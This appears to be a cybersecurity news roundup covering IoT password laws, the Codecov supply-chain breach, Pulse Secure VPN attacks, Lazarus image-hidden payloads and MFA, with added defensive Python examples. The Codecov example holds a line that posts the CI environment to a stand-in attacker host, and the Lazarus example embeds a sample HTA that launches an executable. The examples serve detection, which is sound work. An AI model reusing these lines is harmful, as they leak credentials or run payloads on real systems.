More stories

  • Easy-to-guess default device passwords are a step closer to being banned

    Easy-to-guess default passwords will be banned and smart device manufacturers will be required to tell customers how long their new product will receive security updates under plans to protect Internet of Things (IoT) devices and their users from cyberattacks.

    Laws will also require manufacturers of smart devices including phones, doorbells, cameras, speakers, TVs and more to provide a public point of contact to make it simpler for security vulnerabilities in the products to be reported – and fixed with software updates.


    Households and businesses are increasingly connecting IoT products to their networks – but while they’re being deployed with the aim of providing benefits, insecure IoT devices can be exploited by cyber criminals. That can lead to malicious hackers using insecure smart devices as a stepping stone onto corporate or personal networks and using that access as a means of conducting cyberattacks, as well as potentially invading the privacy of users.

    In an effort to protect smart devices, the UK government’s Department for Digital, Culture, Media and Sport (DCMS) has announced that the need for IoT devices to be Secure by Design will become law. DCMS had previously proposed the idea, but now it has moved another step towards actually becoming legislation – and smartphones will be included in the plans.

    Under the planned new laws, customers must be informed at the point of sale of the length of time for which a smart device will receive security software updates, in a move designed to encourage people to buy devices that are going to receive security patches for a long time – making them more resilient to cyber threats that exploit new vulnerabilities.

    This will also apply to smartphones, which are now going to be included in any legislation designed to boost the defences of connected devices. The addition of smartphones follows a government call for views on smart device security in which respondents suggested the amount of personal information on smartphones, and the way they’re so widely used, means they should be included in smart device safety legislation.

    Manufacturers will also be banned from using default passwords such as ‘password’ or ‘admin’ in an effort to protect users from opportunistic cyberattacks that take advantage of common or weak passwords to gain control of devices. The proposed legislation builds on a previously published code of practice for IoT device manufacturers – although now the suggestions would be required, not just recommended.

    “Consumers are increasingly reliant on connected products at work and at home. The COVID-19 pandemic has only accelerated this trend and while manufacturers of these devices are improving security practices gradually, it is not yet good enough,” said Ian Levy, technical director at the National Cyber Security Centre (NCSC).

    “To protect consumers and build trust across the sector, it is vital that manufacturers take responsibility and pay attention to these proposals now,” he added.

    The NCSC has previously provided advice for consumers on how to keep their IoT devices secure. There’s currently no indication of when the proposals will be made law, but the government says the legislation will be introduced “as soon as parliamentary time allows” and businesses will be given time to adjust to the laws once they’re introduced. There are also no details as yet about how the legislation will be enforced, or what measures will be taken against smart device manufacturers or retailers that aren’t compliant.

  • Codecov breach impacted ‘hundreds’ of customer networks: report

    DevOps tool provider Codecov’s security breach has impacted “hundreds” of clients according to new information surrounding the incident. 

    US investigators examining the case told Reuters on Tuesday that the attackers responsible for the hack managed to exploit not only Codecov software, but also potentially used the organization as a springboard to compromise a huge number of customer networks.

    Based in San Francisco, Codecov offers code coverage and software testing tools. The aim is to allow users to deploy “healthier” code during the DevOps cycle, but on or around January 31, 2021, an unknown attacker was able to exploit an error in Codecov’s Docker image creation process to tamper with the Codecov Bash Uploader script. Because the uploader is fetched and executed inside customers’ build jobs, the tampered copy ran with access to whatever those jobs could see, which has led to the potential export of information stored in users’ continuous integration (CI) environments.

    Speaking on condition of anonymity to the news agency, one of the investigators said attackers used automation to collect credentials as well as “raid additional resources,” which may have included data hosted on the networks of other software development program vendors, including IBM. An IBM spokesperson told Reuters that, as of now, there does not seem to be any “modifications of code involving clients” or the company itself.

    Codecov has over 29,000 enterprise clients and also works extensively with the open source community and startups.
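    The control a practitioner wants against the mechanism described above is to never execute a script straight from a download: fetch it to a file, compare its digest with a value pinned out of band, and only then run it. The following is an added example written for this page, not Codecov’s code or the real uploader. The two scripts, the host attacker.invalid, the pinned digest (computed here from the constructed “good” script in place of a vendor-published checksum) and the exfiltration heuristic are all assumptions of the example.

```python
import hashlib
import hmac
import re

# Constructed stand-ins (illustrative text, not the real Codecov uploader): a
# coverage upload script, and a copy with one line added by an attacker.
GOOD_SCRIPT = """\
#!/usr/bin/env bash
set -e
echo "collecting coverage reports"
curl -sS --data-binary @coverage.xml "https://coverage.example/upload?token=$CODECOV_TOKEN"
"""

# The added line posts the whole job environment (tokens, keys, cloud
# credentials) to an attacker-controlled host and leaves everything else intact.
TAMPERED_SCRIPT = GOOD_SCRIPT + 'curl -s -d "$(env)" https://attacker.invalid/collect\n'


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Stands in for a digest obtained out of band (a signed release note, the
# vendor's checksum file) and stored with the pipeline, never fetched from the
# same URL as the script it protects.
PINNED_SHA256 = sha256_hex(GOOD_SCRIPT.encode())


def digest_matches(data: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the download's SHA-256 with the pinned value."""
    return hmac.compare_digest(sha256_hex(data), pinned_hex.lower())


# Crude review heuristic, an assumption of this example rather than a published
# rule: flag a line that both talks to the network and expands the environment.
NETWORK_CLIENT = re.compile(r"\b(curl|wget|nc|ncat)\b")
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv|set)\b|`\s*(env|printenv)\b")


def suspicious_lines(script: str) -> list:
    """Return (line_number, text) for lines that appear to ship the environment out."""
    hits = []
    for number, line in enumerate(script.splitlines(), 1):
        if NETWORK_CLIENT.search(line) and ENV_DUMP.search(line):
            hits.append((number, line.strip()))
    return hits


def gate_script(data: bytes, pinned_hex: str) -> tuple:
    """Decide whether a downloaded script may run: returns (allowed, reasons).

    The digest check is the control; the pattern scan is a second opinion for
    reviewing a new upstream version before its digest is pinned.
    """
    reasons = []
    if not digest_matches(data, pinned_hex):
        reasons.append(f"sha256 {sha256_hex(data)} does not match pinned {pinned_hex}")
    for number, line in suspicious_lines(data.decode(errors="replace")):
        reasons.append(f"line {number} sends the environment to the network: {line}")
    return (not reasons, reasons)


if __name__ == "__main__":
    for name, script in (("original", GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        allowed, reasons = gate_script(script.encode(), PINNED_SHA256)
        print(name, "allowed" if allowed else "blocked", *reasons, sep="\n  ")
```

    In a pipeline the same gate sits between the download step and the execution step: the job writes the fetched script to disk, calls `gate_script` with the digest stored in the repository or a CI secret, and executes the file only when the gate allows it, so a server-side substitution fails closed instead of running with the job’s credentials.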

    The initial compromise and backdoor in the Bash Uploader script were discovered on April 1, impacting Codecov’s full set of “Bash Uploaders” including the Codecov-actions uploader for GitHub, the Codecov CircleCI Orb, and the Codecov Bitrise Step. It is possible that the supply chain attack, made possible by compromising a resource used by other organizations, may have resulted in the theft of credentials, tokens, and keys running through client CIs, as well as “services, datastores, and application code that could be accessed with these credentials,” according to Codecov. In addition, URLs of origin repositories using the Bash Uploaders may have been exposed.

    Codecov said the issue has since been fixed and impacted customers were notified via email addresses on file on April 15. It is recommended that users roll their credentials if they have not already done so. Codecov is also rotating internal credentials and has pulled in a third-party cyberforensics firm to conduct an audit. A new monitoring system is also being created to prevent such “unintended changes” from happening in the future.

    “Codecov maintains a variety of information security policies, procedures, practices, and controls,” commented Jerrod Engelberg, Codecov CEO. “We continually monitor our network and systems for unusual activity, but Codecov, like any other company, is not immune to this type of event.”

    Due to the potential ramifications of this attack, the FBI is also involved. The ongoing federal investigation has led to suggestions the Codecov situation could be likened to SolarWinds, in which the software vendor’s network was compromised in order to deploy a malicious software update to clients in a separate supply chain attack. Last week, the FBI, NSA, CISA, and UK government formally blamed cyberattackers working for Russian intelligence for the SolarWinds incident. ZDNet has reached out to Codecov and we will update when we hear back.

    Have a tip?
Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

  • Hackers are actively targeting flaws in these VPN devices. Here's what you need to do

    Cybersecurity firm FireEye and the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) have issued a warning over attackers exploiting a newly discovered flaw in Pulse Connect Secure VPN products. FireEye reported it has been investigating multiple incidents of compromises of the devices that use a bug tracked as CVE-2021-22893, which was discovered in April. It is a critical bug with a CVSS severity score of 10 out of a possible 10, and the malware being deployed is designed to bypass two-factor authentication.

    The vulnerability is an authentication bypass that can “allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway,” according to Pulse Secure’s advisory.

    FireEye’s incident response unit Mandiant says it is tracking 12 malware families linked to attacks on Pulse Secure VPN appliances that use this bug in combination with older bugs affecting the software. FireEye has attributed the activity to a group it labels UNC2630, a suspected China state-sponsored hacking group that has allegedly targeted the US defense industry and European organizations. Ivanti, the US-based IT asset management firm that owns Pulse Secure, has released the Pulse Connect Secure Integrity Tool and other mitigations for the bug that’s under attack.

    CISA said the attacks on this VPN product began in June 2020. Other bugs the attackers have used include CVE-2019-11510, CVE-2020-8260, and CVE-2020-8243, which allow them to install web shells to gain persistence on the device. As ZDNet reported last August, attackers have been scanning the internet for Pulse Secure VPN servers with these flaws since June because the VPNs are used by staff to remotely access internal apps.

    “The threat actor is using this access to place web shells on the Pulse Connect Secure appliance for further access and persistence. The known web shells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching,” CISA warned in its alert.

    According to FireEye, the threat actor was harvesting credentials from Pulse Secure VPN login processes, allowing them to use legitimate credentials to move within a compromised network. Because those credentials are valid, that movement looks like ordinary user activity, so patching the appliance alone does not evict an attacker who already holds working accounts.

    Carnegie Mellon University’s CERT Coordination Center (CERT/CC) has also issued an alert over the attacks and, until a patch is released, it recommends disabling the Windows File Share Browser and Pulse Secure Collaboration features on Pulse Connect Secure (PCS) gateway instances. “An unspecified vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable Pulse Connect Secure gateway system. Products affected by this vulnerability are PCS version 9.0R3 and higher,” it noted.

    FireEye is tracking two groups using these vulnerabilities and a variety of web shells that share common traits. It has tagged the other group UNC2717, but says it cannot confirm that the two groups’ activities are connected.
“Due to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717,” said FireEye. “We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected [Advanced Persistent Threat] actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools.”

  • New Australian cyber package includes AU$37.5m Indo-Pacific investment

    The Australian government has launched a new strategy aimed at uplifting the cybersecurity capabilities of the nation and its international neighbours, pledging an additional AU$37.5 million in funding alongside a handful of greater Indo-Pacific initiatives.

    Australia’s International Cyber and Critical Technology Engagement Strategy, according to Minister for Foreign Affairs Marise Payne, sets out the goals for a “safe, secure, and prosperous Australia, Indo-Pacific, and world, enabled by cyberspace and critical technology”. It is hoped the strategy will strengthen national security, protect Australia’s democracy and sovereignty, promote economic growth, and pursue international peace and stability. The strategy supersedes the 2017 International Cyber Engagement Strategy and is centred on three main pillars — values, security, and prosperity — to guide Australia’s international cyber and critical technology engagement.

    The first goal is for technology to be used to “uphold and protect liberal democratic values”, the strategy outlined. To achieve this goal, the strategy said Australia will advocate for cyberspace and critical technologies to uphold and protect democratic principles and processes; promote and protect human rights online and in the design, development, and use of critical technologies; support the ethical design, development, and use of critical technologies consistent with international law, including human rights; and advocate for diversity, gender equality, and women’s empowerment in the design, development and use of cyberspace and critical technology.

    Under the values banner, the strategy pointed to a handful of initiatives that Australia is a part of, including the Global Partnership on AI and the AI ethics framework that was released in November 2019 to help guide businesses and governments seeking to design, develop, deploy, and operate AI in Australia, as well as the women in international security and cyberspace fellowship that was launched in February 2020 alongside Canada, the Netherlands, New Zealand, and the United Kingdom.

    Security, the strategy stated, has the goal of “secure, resilient, and trusted technology”. The Australian government is hopeful that shaping the development and use of critical technology, including cyberspace, will help support international peace and stability. To achieve this, it will aim to build international resilience to digital disinformation and misinformation and their effects; build a strong and resilient cybersecurity capability for Australia, the Indo-Pacific, and the world; strengthen cooperation for enhanced prevention, detection, investigation, and prosecution of cybercrime; and enable a safe and inclusive online environment.

    As part of the strategy, expanding on its “security” pillar, Australia will co-sponsor a proposal to establish a new United Nations program of action for responsible state behaviour in cyberspace. Also under security, the strategy said the government will continue to attribute malicious cyber activities to states, calling it “one tool in Australia’s toolkit”. The government has on eight occasions publicly attributed activity.

    Further, the government’s existing Cyber Cooperation Program will be renamed the Cyber and Critical Tech Cooperation Program and will receive an additional AU$20.5 million to “strengthen cyber and critical technology resilience in Southeast Asia”. The program, which previously received AU$34 million in official development assistance funding from 2016-2023, was previously touted as playing an important role in supporting Australia’s international cyber engagement, championing an “open, free, and secure internet that protects national security and promotes international stability while driving global economic growth and sustainable development.”

    The government will also contribute a further AU$17 million to support neighbours in the Pacific to strengthen their cyber capabilities and resilience, including for fighting cybercrime, improving online safety, and countering disinformation and misinformation. The “security” chapter of the strategy also pointed to existing initiatives, including those underway by the eSafety Commissioner; a handful of technology-related legislation, such as the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018; work on combating misinformation; and the lacklustre Cyber Security Strategy launched in August.

    Lastly, under “prosperity”, the strategy stated Australia’s goal would be to use technology to foster sustainable economic growth and development. It aims to do this through supporting a connected and prosperous Indo-Pacific made up of independent sovereign states enabled by secure and economically viable critical technology; advocating for open, resilient, diverse, and competitive international technology markets and supply chains; strengthening Australian research, industry, and innovation through international cooperation; shaping international critical technology standards that foster interoperability, innovation, transparency, diverse markets, and security-by-design; promoting the multi-stakeholder model of internet governance; and maximising economic growth by shaping an enabling environment for digital trade.

    Additionally, Australia will support a partnership with Standards Australia in Southeast Asia, a partnership with the University of Technology, Sydney in Southeast Asia, and a partnership with Trustwave in Fiji, Samoa, Solomon Islands, Tonga, and Vanuatu.

    “Cyberspace and critical technology is a top foreign policy priority,” Australia’s Ambassador for Cyber Affairs and Critical Technology Dr Tobias Feakin said. “The strategy sets out our goal for a safe, secure, and prosperous Australia, Indo-Pacific, and world enabled by cyberspace and critical technology. It provides a framework to guide Australia’s international engagement.”

  • Google issues Chrome update patching seven security vulnerabilities

    Google on Wednesday released version 90.0.4430.85 of the Chrome browser for Windows, Mac, and Linux. The release contains seven security fixes, including one for a zero-day vulnerability that was exploited in the wild.

    The zero-day, which was assigned the identifier CVE-2021-21224, was described as a “type confusion in V8”.

    In an advisory penned by Chrome technical program manager Srinivas Sista, five vulnerabilities were detailed: CVE-2021-21222 heap buffer overflow in V8, CVE-2021-21223 integer overflow in Mojo, CVE-2021-21225 out of bounds memory access in V8, CVE-2021-21226 use after free in navigation, and CVE-2021-21224 type confusion in V8. “Google is aware of reports that exploits for CVE-2021-21224 exist in the wild,” he wrote.

    The advisory thanked five researchers for their contributions and added that its own ongoing security work was responsible for a wide range of fixes.


  • Internal Facebook email reveals intent to frame data scraping as ‘normalized, broad industry issue’

    An internal email accidentally leaked by Facebook to a journalist has revealed the firm’s intentions to frame a recent data scraping incident as “normalized” and a “broad industry issue.”

    Facebook has recently been at the center of a data scraping controversy. Earlier this month, Hudson Rock researchers revealed that information belonging to roughly 533 million users had been posted online, including phone numbers, Facebook IDs, full names, and dates of birth. The social media giant confirmed the leak of the “old” data, which had been scraped in 2019. A flaw in the platform’s contact importer feature, now fixed, allowed the automated harvesting of the data to take place.

    The scraping and subsequent online posting of user data drew widespread criticism, and on April 14 the Irish Data Protection Commission (DPC) said it planned to launch an inquiry to ascertain whether the GDPR and/or the Data Protection Act 2018 have been “infringed by Facebook.”

    Now, an internal email leaked to the media (Dutch article, translated) has potentially revealed how Facebook wishes to handle the blowback. This month, Data News editor Pieterjan Van Leemputten sent several queries to Facebook requesting an update on the data scraping incident and further clarity concerning the breach timeline. However, Facebook accidentally included the journalist in an internal emailed discussion thread.

    In the original emails sent to EMEA region PR staff, viewed by ZDNet and dated from April 8, Facebook’s team outlined an overall “long-term strategy” for dealing with coverage of data scraping incidents. “Assuming press volume continues to decline, we’re not planning additional statements on this issue,” the email reads. “Longer term, though, we expect more scraping incidents and think it’s important to both frame this as a broad industry issue and normalize the fact that this activity happens regularly.”

    “To do this, the team is proposing a follow-up post in the next several weeks that talks more broadly about our anti-scraping work and provides more transparency around the amount of work we’re doing in this area,” the message continues. “While this may reflect a significant volume of scraping activity, we hope this will help to normalize the fact that this activity is ongoing and avoid criticism that we aren’t being transparent about particular incidents.”

    Image: a redacted portion of the email thread (Pieterjan Van Leemputten)
    The thread also includes lists of existing global coverage surrounding the story, such as by ZDNet, CNET, Graham Cluley, Reuters, The Guardian, and The Wall Street Journal, to name a few; broadcast coverage and tweets considered “notable,” as well as statistics on social conversation and mentions on Twitter. While describing overall coverage, the email says that publications “have offered more critical takes of Facebook’s response framing it as evasive, a deflection of blame and absent of an apology for the users impacted.”

    “These pieces are often driven by quotes from data experts or regulators, keen on criticizing the company’s response as insufficient or framing the company’s assertion that the information was already public as misleading,” the team added. “With regulators fully zeroed in on the issue, expect the steady drumbeat of criticism to continue in the press.”

    Update 13.52 BST: A Facebook spokesperson told ZDNet: “We are committed to continuing to educate users about data scraping. We understand people’s concerns, which is why we continue to strengthen our systems to make scraping from Facebook without our permission more difficult and go after the people behind it. That’s why we devote substantial resources to combat it and will continue to build out our capabilities to help stay ahead of this challenge.”


  • Lazarus hacking group now hides payloads in BMP image files

    The Lazarus group has tweaked its loader obfuscation techniques by abusing image files in a recent phishing campaign. 

    Lazarus is a state-sponsored advanced persistent threat (APT) group from North Korea. Known as one of the most prolific and sophisticated APTs out there, Lazarus has been in operation for over a decade and is considered responsible for worldwide attacks including the WannaCry ransomware outbreak, bank thefts, and assaults against cryptocurrency exchanges. South Korean organizations are consistent targets for Lazarus, although the APT has also been traced back to cyberattacks in the US and, more recently, South Africa.

    In a campaign documented by Malwarebytes on April 13, a phishing document attributed to Lazarus revealed the use of an interesting technique designed to obfuscate payloads in image files. The attack chain begins with a phishing Microsoft Office document (참가신청서양식.doc) with a lure in the Korean language. Intended victims are asked to enable macros in order to view the file’s content, which, in turn, triggers a malicious payload. The macro brings up a pop-up message which claims the document was made with an old version of Office, but in the background it extracts an executable HTA file that is stored zlib-compressed inside a PNG image embedded in the document.

    To unpack it, the macro converts the PNG to the BMP format. PNG pixel data is zlib-compressed, while BMP stores pixels uncompressed, so the image conversion itself inflates the hidden object and the macro never has to call a decompression routine that a scanner might flag. Once triggered, the HTA drops a loader for a Remote Access Trojan (RAT), stored as “AppStore.exe” on the target machine.

    “This is a clever method used by the actor to bypass security mechanisms that can detect embedded objects within images,” the researchers say. “The reason is because the document contains a PNG image that has a compressed zlib malicious object and since it’s compressed it can not be detected by static detections. Then the threat actor just used a simple conversion mechanism to decompress the malicious content.”

    The RAT is able to connect to a command-and-control (C2) server, receive commands, and drop shellcode. Communication between the malware and C2 is base64 encoded and encrypted using a custom encryption algorithm that has previously been linked to Lazarus’ Bistromath RAT.

    In related news, Google’s Threat Analysis Group (TAG) warned earlier this month that North Korean threat actors are targeting security researchers across social media. First spotted in January, the scheme now includes a web of sham profiles, browser exploits, and a fake offensive security company.
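    As an added example (not Malwarebytes’ analysis tooling and not the real sample), the following builds a small PNG whose pixel data carries a constructed HTA stand-in and shows the detection gap the researchers describe: a byte scan of the file finds nothing because the content sits inside the zlib IDAT stream, while a scan of the inflated pixel buffer finds it. The marker list, the sample HTA text and the greyscale-only, filter-0-only decoder are assumptions of the example; a real triage script would decode with a full image library and scan that buffer instead.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Strings that should never appear in pixel data; their presence in the
# inflated image suggests a script is riding along inside the picture.
SCRIPT_MARKERS = (b"<script", b"<hta:application", b"createobject(", b"wscript.shell")


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png_with_payload(payload: bytes, width: int = 128) -> bytes:
    """Constructed sample: an 8-bit greyscale PNG whose pixel bytes are `payload`.

    Mirrors the shape of the trick: the bytes only become visible after the
    IDAT zlib stream is inflated, which a PNG-to-BMP conversion does as a
    side effect of writing uncompressed pixels.
    """
    padded = payload + b"\x00" * (-len(payload) % width)
    height = len(padded) // width
    # One scanline = filter byte (0 = no filtering) followed by `width` pixels.
    rows = [b"\x00" + padded[r * width:(r + 1) * width] for r in range(height)]
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)  # depth 8, greyscale
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows)))
            + _chunk(b"IEND", b""))


def png_chunks(png: bytes):
    """Yield (type, data) for each chunk, checking the signature and every CRC."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def pixel_bytes(png: bytes) -> bytes:
    """Inflate the IDAT stream and return raw pixel bytes (8-bit grey, filter 0 only).

    Real images use other colour types and filters; for those, hand the file to
    a full decoder (e.g. Pillow) and scan the pixel buffer it produces instead.
    """
    width = height = None
    idat = b""
    for ctype, data in png_chunks(png):
        if ctype == b"IHDR":
            width, height, depth, colour = struct.unpack(">IIBB", data[:10])
            if depth != 8 or colour != 0:
                raise NotImplementedError("only 8-bit greyscale is handled here")
        elif ctype == b"IDAT":
            idat += data
    raw = zlib.decompress(idat)
    stride = width + 1
    rows = []
    for r in range(height):
        line = raw[r * stride:(r + 1) * stride]
        if line[0] != 0:
            raise NotImplementedError(f"row {r} uses filter type {line[0]}")
        rows.append(line[1:])
    return b"".join(rows)


def find_script_markers(data: bytes) -> list:
    """Return the markers from SCRIPT_MARKERS present in `data` (case-insensitive)."""
    low = data.lower()
    return [m for m in SCRIPT_MARKERS if m in low]


def scan_png(png: bytes) -> dict:
    """Contrast a naive scan of the file bytes with a scan of the decoded pixels."""
    return {"static": find_script_markers(png),
            "decoded": find_script_markers(pixel_bytes(png))}


# Constructed stand-in for the dropped HTA (illustrative, not the real sample).
SAMPLE_HTA = (b'<html><head><HTA:APPLICATION id="x" windowstate="minimize"/>\n'
              b'<script language="VBScript">\n'
              b'Set sh = CreateObject("WScript.Shell")\n'
              b'sh.Run "AppStore.exe", 0, False\n'
              b'</script></head></html>\n')

SAMPLE_PNG = build_png_with_payload(SAMPLE_HTA)

if __name__ == "__main__":
    print(scan_png(SAMPLE_PNG))  # static: [] ; decoded: all four markers
```

    The practical lesson is where the scan runs: images extracted from an Office document should be decoded to pixels before any string or YARA-style matching, because the compressed container is exactly what the static check sees and the conversion step in the macro is what the victim’s machine sees.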


  • Multi-factor authentication: Use it for all the people that access your network, all the time

    The most common way criminal hackers break into enterprise networks is by stealing or guessing usernames and passwords. These attacks, whether the goal is stealing information, executing a ransomware attack or any other form of cybercrime, represent a major risk to organisations of all kinds – but there’s one thing that information security teams can do to dramatically help protect the network and its users from cyber criminals.

    “You want to be using strong authentication for anyone that accesses your environment,” Ann Johnson, corporate vice president of security, compliance & identity business development at Microsoft, told ZDNet Security Update.

    “We know that 99% of hacks have some type of password element, however that password was stolen. Using strong authentication will at least give you a first line of defence against that,” she said, adding: “Use multi-factor authentication for 100% of the people that access your environment 100% of the time”.

    Providing employees with multi-factor authentication – which requires the user to confirm that it was really them who just tried to log into their account – helps boost cybersecurity in two ways. First, it makes it a lot more difficult for a cyber criminal to break into an account, even if they know the correct username and password. Second, if multi-factor authentication stops a login attempt not made by the user, the denied prompt is itself evidence that someone else already holds a valid password for that account, so it is an indication of suspicious activity that can serve as an alert about cyber criminals attempting to breach the network.
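    The second benefit above, a denied MFA prompt as a detection signal, as an added example that is not code from the article or from Microsoft: a small detector run over constructed authentication events. The log format (timestamp, user, source IP, MFA outcome), the three-denials-in-ten-minutes threshold and the “approved after a burst of denials” escalation are assumptions of the example to be tuned per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of authentication events (not real logs), one per line:
# timestamp, user, source IP, outcome of the MFA step.
SAMPLE_AUTH_LOG = """\
2021-04-21T08:00:05Z alice 203.0.113.7 mfa_denied
2021-04-21T08:01:10Z alice 203.0.113.7 mfa_denied
2021-04-21T08:02:30Z alice 203.0.113.7 mfa_denied
2021-04-21T08:03:15Z alice 203.0.113.7 mfa_approved
2021-04-21T08:05:00Z bob 198.51.100.4 mfa_denied
2021-04-21T08:06:00Z bob 198.51.100.4 mfa_approved
2021-04-21T09:30:00Z carol 192.0.2.9 mfa_denied
2021-04-21T11:00:00Z carol 192.0.2.9 mfa_denied
2021-04-21T13:00:00Z carol 192.0.2.9 mfa_denied
"""


def parse_events(text: str) -> list:
    """Parse log lines into (timestamp, user, source_ip, outcome) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, outcome = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, ip, outcome))
    return events


def mfa_alerts(events: list, threshold: int = 3,
               window: timedelta = timedelta(minutes=10)) -> list:
    """Flag users whose password passed but whose MFA prompt was denied repeatedly.

    A user with `threshold` or more denials inside `window` gets an alert. An
    approval arriving within `window` of the last denial is recorded as
    `approved_after`: the pattern of an attacker with a valid password finally
    wearing the user down (prompt bombing), which deserves the higher severity.
    """
    recent = defaultdict(deque)  # user -> timestamps of denials inside the window
    alerts = {}                  # user -> alert record
    for ts, user, ip, outcome in sorted(events):
        if outcome == "mfa_denied":
            q = recent[user]
            q.append(ts)
            while ts - q[0] > window:   # drop denials that fell out of the window
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(user, {"user": user, "source_ip": ip,
                                                 "first": q[0], "approved_after": False})
                alert["last"] = ts
                alert["denials"] = len(q)
        elif outcome == "mfa_approved":
            alert = alerts.get(user)
            if alert is not None and ts - alert["last"] <= window:
                alert["approved_after"] = True
    return sorted(alerts.values(), key=lambda a: a["first"])


def format_alert(alert: dict) -> str:
    """One-line summary suitable for a ticket or SIEM notification."""
    severity = "HIGH" if alert["approved_after"] else "MEDIUM"
    return (f"[{severity}] {alert['user']} from {alert['source_ip']}: "
            f"{alert['denials']} MFA denials between {alert['first']:%H:%M:%S} "
            f"and {alert['last']:%H:%M:%S}"
            + (", then approved" if alert["approved_after"] else ""))


if __name__ == "__main__":
    for alert in mfa_alerts(parse_events(SAMPLE_AUTH_LOG)):
        print(format_alert(alert))
```

    On the constructed data only alice is flagged: three denials in under three minutes followed by an approval is the sequence an analyst should treat as a compromised password rather than a fumbled code, whereas bob’s single denial and carol’s denials hours apart stay below the threshold. The window-based count, not the raw total, is what separates the two.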

    Microsoft has previously said that multi-factor authentication is so effective that it prevents 99.9% of account-compromise attacks. But cybersecurity isn’t something that should be passed onto end users – it’s important for organisations to have information security policies in place that will protect people from cyberattacks in the first place.

    One way of doing this is by applying a least privilege, zero trust model to the network, providing people with the access they need to do their jobs and nothing more. That prevents an attacker who has taken control of a standard account from leveraging it to gain administrator privilege or move laterally to areas of the network that the employee doesn’t need access to for their job – but that cyber criminals could exploit.

    That’s something that’s proved to be a difficult issue for many organisations over the past year as they have suddenly had to adapt to employees being forced to work remotely. Many employees have found themselves in difficult circumstances, sharing networks or devices with families that could allow attackers onto their device without them even knowing.

    “Employees may be sharing their device with their child who’s doing schooling and then malware could come in that way,” said Johnson. “So having least privilege on that device and having that device not be able to do anything but the minimum for the job is incredibly important. Your end users do not need admin privilege,” she added.
